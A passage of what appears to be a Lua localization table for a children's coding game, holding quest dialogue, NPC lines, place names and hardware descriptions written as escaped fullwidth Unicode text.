\239\189\143\239\189\149\239\189\148\239\189\144\239\189\149\239\189\148. \239\188\161\239\189\148 \239\189\129\239\189\142\239\189\153 \239\189\135\239\189\137\239\189\150\239\189\133\239\189\142 \239\189\141\239\189\143\239\189\141\239\189\133\239\189\142\239\189\148, \239\189\133\239\189\150\239\189\133\239\189\146\239\189\153 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\137\239\189\147 \239\189\137\239\189\142 \239\189\143\239\189\142\239\189\133 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 2 \239\189\130\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\189\131\239\189\143\239\189\142\239\189\132\239\189\137\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\140\239\189\143\239\189\151 (0) \239\189\143\239\189\146 \239\189\136\239\189\137\239\189\135\239\189\136 (1).",
["questsCompleted"] = "\239\188\177\239\189\149\239\189\133\239\189\147\239\189\148\239\189\147 \239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133\239\189\132",
["portetherReceptionist"] = "\239\188\168\239\189\133\239\189\153 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133, \239\189\151\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146 \239\188\180\239\189\143\239\189\151\239\189\142 \239\188\168\239\189\129\239\189\140\239\189\140. \239\188\180\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\153\239\189\143\239\189\146'\239\189\147 \239\189\143\239\189\134\239\189\134\239\189\137\239\189\131\239\189\133 \239\189\137\239\189\147 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\144\239\189\129\239\189\147\239\189\148 \239\189\141\239\189\133.",
["sharesQuest4"] = "\239\188\183\239\189\133 \239\189\147\239\189\148\239\189\143\239\189\146\239\189\133 \239\189\143\239\189\149\239\189\146 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\143\239\189\142 \239\189\143\239\189\148\239\189\136\239\189\133\239\189\146 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146\239\189\147.",
["sharesQuest5"] = "\239\188\183\239\189\136\239\189\129\239\189\148 \239\189\132\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139?",
["sharesQuest2"] = "\239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\137\239\189\133\239\189\132 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\129 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142?",
["sharesQuest3"] = "\239\188\174\239\189\137\239\189\131\239\189\133 \239\189\143\239\189\142\239\189\133! \239\188\174\239\189\143\239\189\151 \239\188\169 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\136\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\151\239\189\133 \239\189\139\239\189\133\239\189\133\239\189\144 \239\189\129\239\189\140\239\189\140 \239\189\143\239\189\134 \239\189\143\239\189\149\239\189\146 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147. \239\188\180\239\189\129\239\189\139\239\189\133 \239\189\129 \239\189\140\239\189\143\239\189\143\239\189\139 \239\189\129\239\189\148 \239\189\143\239\189\142\239\189\133 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\143\239\189\147\239\189\133 \239\189\141\239\189\129\239\189\131\239\189\136\239\189\137\239\189\142\239\189\133\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\143\239\189\143\239\189\141.",
["sharesQuest1"] = "\239\188\168\239\189\133\239\189\153\239\189\129! \239\188\179\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\151\239\189\129\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\134\239\189\137\239\189\142\239\189\132 \239\189\143\239\189\149\239\189\148 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\136\239\189\143\239\189\151 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133\239\189\147 \239\189\147\239\189\148\239\189\143\239\189\146\239\189\133\239\189\147 \239\189\132\239\189\129\239\189\148\239\189\129? \239\188\168\239\189\143\239\189\151 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\153 \239\189\147\239\189\136\239\189\129\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\129 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\143\239\189\142\239\189\140\239\189\137\239\189\142\239\189\133?",
["cHDMITitle"] = "\239\188\168\239\188\164\239\188\173\239\188\169",
["plainsAdventureGirl"] = "\239\188\180\239\189\136\239\189\137\239\189\147 \239\189\144\239\189\129\239\189\148\239\189\136 \239\189\140\239\189\133\239\189\129\239\189\132\239\189\147 \239\189\148\239\189\143 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133, \239\189\129 \239\189\132\239\189\129\239\189\146\239\189\139 \239\189\147\239\189\136\239\189\129\239\189\132\239\189\153 \239\189\144\239\189\140\239\189\129\239\189\131\239\189\133. \239\188\180\239\189\136\239\189\133\239\189\153 \239\189\147\239\189\129\239\189\153 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\143\239\189\142\239\189\140\239\189\153 \239\189\148\239\189\136\239\189\143\239\189\147\239\189\133 \239\189\151\239\189\136\239\189\143 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147 \239\189\135\239\189\133\239\189\148 \239\189\146\239\189\133\239\189\147\239\189\144\239\189\133\239\189\131\239\189\148\239\189\133\239\189\132 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133.",
["momaUpstairsPlaque4"] = "\239\188\173\239\188\175\239\188\181\239\188\182\239\188\174\239\188\180 \239\188\179\239\189\131\239\189\149\239\189\140\239\189\144\239\189\148\239\189\149\239\189\146\239\189\133 \239\188\176\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\141\239\189\133 (1972),\010\239\188\170\239\189\143\239\189\147\239\189\133 \239\188\172\239\189\149\239\189\137\239\189\147 \239\188\161\239\189\140\239\189\133\239\189\152\239\189\129\239\189\142\239\189\131\239\189\143",
["llScaredSon"] = "\239\188\169\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\135\239\189\133\239\189\148 \239\189\140\239\189\143\239\189\147\239\189\148 \239\189\133\239\189\152\239\189\144\239\189\140\239\189\143\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\134\239\189\129\239\189\147\239\189\148 \239\189\148\239\189\146\239\189\129\239\189\150\239\189\133\239\189\140 \239\189\148\239\189\143 \239\189\144\239\189\140\239\189\129\239\189\131\239\189\133\239\189\147 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\132\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146\239\189\133\239\189\132! \239\188\175\239\189\144\239\189\133\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\141\239\189\129\239\189\144 \239\189\151\239\189\137\239\189\148\239\189\136 [\239\188\165\239\188\179\239\188\163] \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\140\239\189\137\239\189\131\239\189\139 \239\189\151\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\151\239\189\129\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\135\239\189\143.",
["momaUpstairsPlaque2"] = "\239\188\173\239\189\129\239\189\142\239\189\132\239\189\133\239\189\140\239\189\130\239\189\146\239\189\143\239\189\148 \239\188\179\239\189\133\239\189\148 (1980),\010\239\188\162\239\189\133\239\189\142\239\189\143\239\189\137\239\189\148 \239\188\173\239\189\129\239\189\142\239\189\132\239\189\133\239\189\140\239\189\130\239\189\146\239\189\143\239\189\148",
["complete"] = "\239\188\177\239\189\149\239\189\133\239\189\147\239\189\148 \239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133",
["momaUpstairsPlaque1"] = "\239\188\176\239\189\133\239\189\146\239\189\140\239\189\137\239\189\142 \239\188\174\239\189\143\239\189\137\239\189\147\239\189\133 (1983),\010\239\188\171\239\189\133\239\189\142 \239\188\176\239\189\133\239\189\146\239\189\140\239\189\137\239\189\142",
["jungleWildGirl"] = "\239\188\168\239\189\143\239\189\151 \239\189\141\239\189\129\239\189\142\239\189\153 \239\189\129\239\189\144\239\189\144\239\189\140\239\189\133\239\189\147 \239\189\131\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\133\239\189\129\239\189\148? \239\188\169 \239\189\130\239\189\133\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142'\239\189\148 \239\189\135\239\189\133\239\189\148 \239\189\143\239\189\150\239\189\133\239\189\146 100.",
["audioQuest3"] = "\239\188\174\239\189\143\239\189\151, \239\189\143\239\189\144\239\189\133\239\189\142 \239\188\179\239\189\143\239\189\142\239\189\137\239\189\131 \239\188\176\239\189\137 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\142\239\189\133\239\189\152\239\189\148 \239\189\148\239\189\143 \239\189\141\239\189\133. \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\149\239\189\147\239\189\133 \239\189\137\239\189\148 \239\189\148\239\189\143 \239\189\151\239\189\146\239\189\137\239\189\148\239\189\133 \239\189\147\239\189\143\239\189\142\239\189\135\239\189\147 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\131\239\189\143\239\189\132\239\189\133.",
["audioQuest2"] = "\239\188\180\239\189\143 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\133\239\189\147\239\189\148 \239\189\147\239\189\143\239\189\142\239\189\135 \239\189\153\239\189\143\239\189\149 \239\189\142\239\189\133\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132. \239\188\179\239\189\144\239\189\133\239\189\129\239\189\139 \239\189\148\239\189\143 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\189\132\239\189\129\239\189\142\239\189\131\239\189\133\239\189\146\239\189\147.",
["devMegan"] = "\239\188\169'\239\189\141 \239\189\129 \239\189\141\239\189\143\239\189\149\239\189\142\239\189\148\239\189\129\239\189\137\239\189\142 \239\189\131\239\189\140\239\189\137\239\189\141\239\189\130\239\189\133\239\189\146 \239\189\129\239\189\142\239\189\132 \239\189\144\239\189\136\239\189\143\239\189\148\239\189\143\239\189\135\239\189\146\239\189\129\239\189\144\239\189\136\239\189\133\239\189\146 \239\189\151\239\189\136\239\189\143 \239\189\129\239\189\147\239\189\147\239\189\149\239\189\146\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\143\239\189\134\239\189\148\239\189\151\239\189\129\239\189\146\239\189\133 \239\189\151\239\189\133 \239\189\147\239\189\136\239\189\137\239\189\144 \239\189\137\239\189\147 \239\189\143\239\189\134 \239\189\136\239\189\137\239\189\135\239\189\136 \239\189\145\239\189\149\239\189\129\239\189\140\239\189\137\239\189\148\239\189\153. \239\188\169 \239\189\129\239\189\140\239\189\147\239\189\143 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\137\239\189\147 \239\188\173\239\189\143\239\189\135.",
["cHexTitle"] = "\239\188\168\239\189\133\239\189\152\239\189\129\239\189\132\239\189\133\239\189\131\239\189\137\239\189\141\239\189\129\239\189\140",
["jungleQuizOption2a"] = "\239\188\163\239\189\136\239\189\129\239\189\142\239\189\135\239\189\133 \239\188\164\239\189\137\239\189\146\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146\239\189\153",
["letsHack"] = "\239\188\172\239\189\133\239\189\148'\239\189\147 \239\189\136\239\189\129\239\189\131\239\189\139!",
["caroline1"] = "\239\188\168\239\189\133\239\189\140\239\189\140\239\189\143 \239\188\169'\239\189\141 \239\188\163\239\189\129\239\189\146\239\189\143\239\189\140\239\189\137\239\189\142\239\189\133, \239\189\148\239\189\136\239\189\133 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146. \239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\144\239\189\140\239\189\133\239\189\129\239\189\147\239\189\133 \239\189\137\239\189\142\239\189\150\239\189\133\239\189\147\239\189\148\239\189\137\239\189\135\239\189\129\239\189\148\239\189\133 \239\189\151\239\189\136\239\189\129\239\189\148'\239\189\147 \239\189\136\239\189\129\239\189\144\239\189\144\239\189\133\239\189\142\239\189\137\239\189\142\239\189\135 \239\189\137\239\189\142 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142? \239\188\167\239\189\133\239\189\148 \239\189\148\239\189\143 \239\188\180\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\188\177\239\189\149\239\189\133\239\189\147\239\189\148 \239\189\148\239\189\136\239\189\146\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146! \239\188\185\239\189\143\239\189\149 \239\189\129\239\189\146\239\189\133 \239\189\131\239\189\149\239\189\146\239\189\146\239\189\133\239\189\142\239\189\148\239\189\140\239\189\153 \239\189\143\239\189\142 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 $1.",
["llNerdDiag"] = "\239\188\169'\239\189\141 \239\189\129 \239\189\147\239\189\148\239\189\149\239\189\132\239\189\133\239\189\142\239\189\148 \239\189\136\239\189\133\239\189\146\239\189\133. \239\188\173\239\189\153 \239\189\134\239\189\129\239\189\150\239\189\143\239\189\146\239\189\137\239\189\148\239\189\133 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\188\174\239\188\175\239\188\180 \239\189\135\239\189\129\239\189\148\239\189\133. \239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\144\239\189\143\239\189\139\239\189\133\239\189\142 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\173\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146 \239\189\153\239\189\133\239\189\148?",
["caroline3"] = "\239\188\180\239\189\136\239\189\129\239\189\142\239\189\139 \239\189\153\239\189\143\239\189\149. \239\188\179\239\189\143\239\189\141\239\189\133\239\189\136\239\189\143\239\189\151 \239\189\153\239\189\143\239\189\149 \239\189\140\239\189\143\239\189\143\239\189\139 \239\189\141\239\189\143\239\189\146\239\189\133... \239\189\144\239\189\143\239\189\151\239\189\133\239\189\146\239\189\134\239\189\149\239\189\140. \239\188\164\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\147\239\189\144\239\189\133\239\189\140\239\189\140\239\189\147?",
["beachSignPost"] = "\239\188\165\239\189\152\239\189\137\239\189\148 \239\189\148\239\189\143 \239\188\176\239\189\143\239\189\151\239\189\133\239\189\146 \239\188\176\239\189\129\239\189\148\239\189\136",
["temp"] = "\239\188\183\239\189\129\239\189\137\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\134\239\189\143\239\189\146 \239\189\131\239\189\143\239\189\144\239\189\153..",
["cResolutionTitle"] = "\239\188\178\239\189\133\239\189\147\239\189\143\239\189\140\239\189\149\239\189\148\239\189\137\239\189\143\239\189\142",
["villageSummercampGirl"] = "\239\188\164\239\189\143 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\150\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133 \239\189\137\239\189\147 \239\189\142\239\189\129\239\189\141\239\189\133\239\189\132 \239\189\129\239\189\134\239\189\148\239\189\133\239\189\146?",
["cTerminal"] = "\239\188\161\239\189\142 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\134\239\189\129\239\189\131\239\189\133 \239\189\134\239\189\143\239\189\146 \239\189\148\239\189\153\239\189\144\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147 \239\189\132\239\189\137\239\189\146\239\189\133\239\189\131\239\189\148\239\189\140\239\189\153 \239\189\148\239\189\143 \239\189\129 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146.",
["cLED"] = "\239\188\161\239\189\142 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\143\239\189\142\239\189\137\239\189\131 \239\189\132\239\189\133\239\189\150\239\189\137\239\189\131\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\133\239\189\141\239\189\137\239\189\148\239\189\147 \239\189\129 \239\189\140\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\151\239\189\136\239\189\133\239\189\142 \239\189\129 \239\189\150\239\189\143\239\189\140\239\189\148\239\189\129\239\189\135\239\189\133 \239\189\137\239\189\147 \239\189\129\239\189\144\239\189\144\239\189\140\239\189\137\239\189\133\239\189\132.",
["portetherCafeText"] = "\239\188\180\239\189\133\239\189\152\239\189\148 \239\189\137\239\189\147 \239\189\130\239\189\133\239\189\148\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\136\239\189\129\239\189\142 \239\188\162\239\189\140\239\189\143\239\189\131\239\189\139\239\189\147 \239\189\134\239\189\143\239\189\146 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135. \239\188\169\239\189\148 \239\189\129\239\189\140\239\189\140\239\189\143\239\189\151\239\189\147 \239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\133\239\189\132\239\189\137\239\189\148 \239\189\142\239\189\149\239\189\141\239\189\130\239\189\133\239\189\146\239\189\147 \239\189\141\239\189\149\239\189\131\239\189\136 \239\189\134\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146.",
["pixelHacker2"] = "\239\188\183\239\189\136\239\189\153 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\149\239\189\147\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\130\239\189\133\239\189\147\239\189\137\239\189\132\239\189\133 \239\189\141\239\189\133 \239\189\129\239\189\142\239\189\132 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\134\239\189\137\239\189\146\239\189\147\239\189\148 3 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148?",
["pixelHacker3"] = "\239\188\174\239\189\137\239\189\131\239\189\133 \239\189\143\239\189\142\239\189\133! \239\188\183\239\189\136\239\189\153 \239\189\142\239\189\143\239\189\148 \239\189\150\239\189\137\239\189\147\239\189\137\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\133\239\189\147\239\189\148? \239\188\180\239\189\136\239\189\133 \239\188\163\239\189\149\239\189\146\239\189\129\239\189\148\239\189\143\239\189\146 \239\189\137\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\133\239\189\141\239\189\133\239\189\142\239\189\148 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133. \239\188\179\239\189\136\239\189\133 \239\189\139\239\189\142\239\189\143\239\189\151\239\189\147 \239\189\129 \239\189\140\239\189\143\239\189\148 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["pixelHacker1"] = "\239\188\168\239\189\137 \239\189\148\239\189\136\239\189\133\239\189\146\239\189\133, \239\189\151\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133! \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\137\239\189\147 \239\189\136\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\134\239\189\129\239\189\141\239\189\143\239\189\149\239\189\147 \239\188\173\239\189\149\239\189\147\239\189\133\239\189\149\239\189\141 \239\189\143\239\189\134 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148. \239\188\169\239\189\134 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\136\239\189\143\239\189\151 \239\189\148\239\189\143 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\129\239\189\146\239\189\148 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\144\239\189\140\239\189\129\239\189\131\239\189\133.",
["LogicLakeNerdHelp3"] = "\239\188\178\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\148\239\189\149\239\189\132\239\189\133\239\189\142\239\189\148 \239\189\137\239\189\142 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133 \239\188\179\239\189\131\239\189\136\239\189\143\239\189\143\239\189\140.",
["jungleArea"] = "\239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\188\170\239\189\149\239\189\142\239\189\135\239\189\140\239\189\133",
["hdmiArea"] = "\239\188\168\239\188\164 \239\188\168\239\189\137\239\189\140\239\189\140",
["portetherSleepingGirl"] = "\239\188\186\239\189\154\239\189\154\239\189\154\239\189\154\239\189\154 \239\188\169'\239\189\141 \239\189\142\239\189\143\239\189\148 \239\189\140\239\189\133\239\189\129\239\189\150\239\189\137\239\189\142\239\189\135 \239\189\136\239\189\133\239\189\146\239\189\133 \239\189\149\239\189\142\239\189\148\239\189\137\239\189\140 \239\188\169 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\129\239\189\148 \239\188\165\239\189\132\239\189\137\239\189\148\239\189\136, \239\188\165\239\189\132\239\189\151\239\189\129\239\189\146\239\189\132 \239\189\129\239\189\142\239\189\132 \239\188\165\239\189\140\239\189\133\239\189\129\239\189\142\239\189\143\239\189\146 \239\189\129\239\189\146\239\189\133 \239\189\143\239\189\139. \239\188\186\239\189\154\239\189\154\239\189\154\239\189\154\239\189\154.",
["pongQuestHelp2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133 2 \239\189\137\239\189\142 \239\188\176\239\189\143\239\189\142\239\189\135.",
["portetherMayorName"] = "\239\188\173\239\189\129\239\189\153\239\189\143\239\189\146 \239\189\143\239\189\134 \239\188\176\239\189\143\239\189\146\239\189\148 \239\188\165\239\189\148\239\189\136\239\189\133\239\189\146",
["codex"] = "\239\188\163\239\189\143\239\189\132\239\189\133\239\189\152",
["cSDCard"] = "\239\188\161 \239\189\134\239\189\140\239\189\129\239\189\147\239\189\136 \239\189\141\239\189\133\239\189\141\239\189\143\239\189\146\239\189\153 \239\189\131\239\189\129\239\189\146\239\189\132 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\131\239\189\129\239\189\142 \239\189\147\239\189\148\239\189\143\239\189\146\239\189\133 \239\189\140\239\189\143\239\189\148\239\189\147 \239\189\143\239\189\134 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\137\239\189\142 \239\189\129 \239\189\147\239\189\141\239\189\129\239\189\140\239\189\140 \239\189\147\239\189\137\239\189\154\239\189\133. \239\188\169\239\189\148 \239\189\137\239\189\147 \239\189\144\239\189\143\239\189\144\239\189\149\239\189\140\239\189\129\239\189\146\239\189\140\239\189\153 \239\189\149\239\189\147\239\189\133\239\189\132 \239\189\137\239\189\142 \239\189\132\239\189\137\239\189\135\239\189\137\239\189\148\239\189\129\239\189\140 \239\189\131\239\189\129\239\189\141\239\189\133\239\189\146\239\189\129\239\189\147, \239\189\141\239\189\143\239\189\130\239\189\137\239\189\140\239\189\133 \239\189\144\239\189\136\239\189\143\239\189\142\239\189\133\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\148\239\189\136\239\189\133 \239\188\171\239\189\129\239\189\142\239\189\143 \239\188\163\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\188\171\239\189\137\239\189\148.",
["secondLoadingText"] = "\239\188\165\239\189\142\239\189\148\239\189\133\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146...",
["you"] = "\239\189\153\239\189\143\239\189\149",
["momaSharesFanatic4"] = "\239\188\183\239\189\143\239\189\151 \239\189\153\239\189\143\239\189\149'\239\189\150\239\189\133 \239\189\141\239\189\129\239\189\132\239\189\133 $1 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147. \239\188\174\239\189\137\239\189\131\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\139 - \239\189\139\239\189\133\239\189\133\239\189\144 \239\189\149\239\189\144 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\132\239\189\137\239\189\142\239\189\135!",
["momaSharesFanatic5"] = "\239\188\183\239\189\143\239\189\129\239\189\136! $1 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\141\239\189\129\239\189\132\239\189\133 \239\189\148\239\189\143\239\189\148\239\189\129\239\189\140. \239\188\161\239\189\151\239\189\133\239\189\147\239\189\143\239\189\141\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\139, \239\189\139\239\189\133\239\189\133\239\189\144 \239\189\137\239\189\148 \239\189\149\239\189\144!",
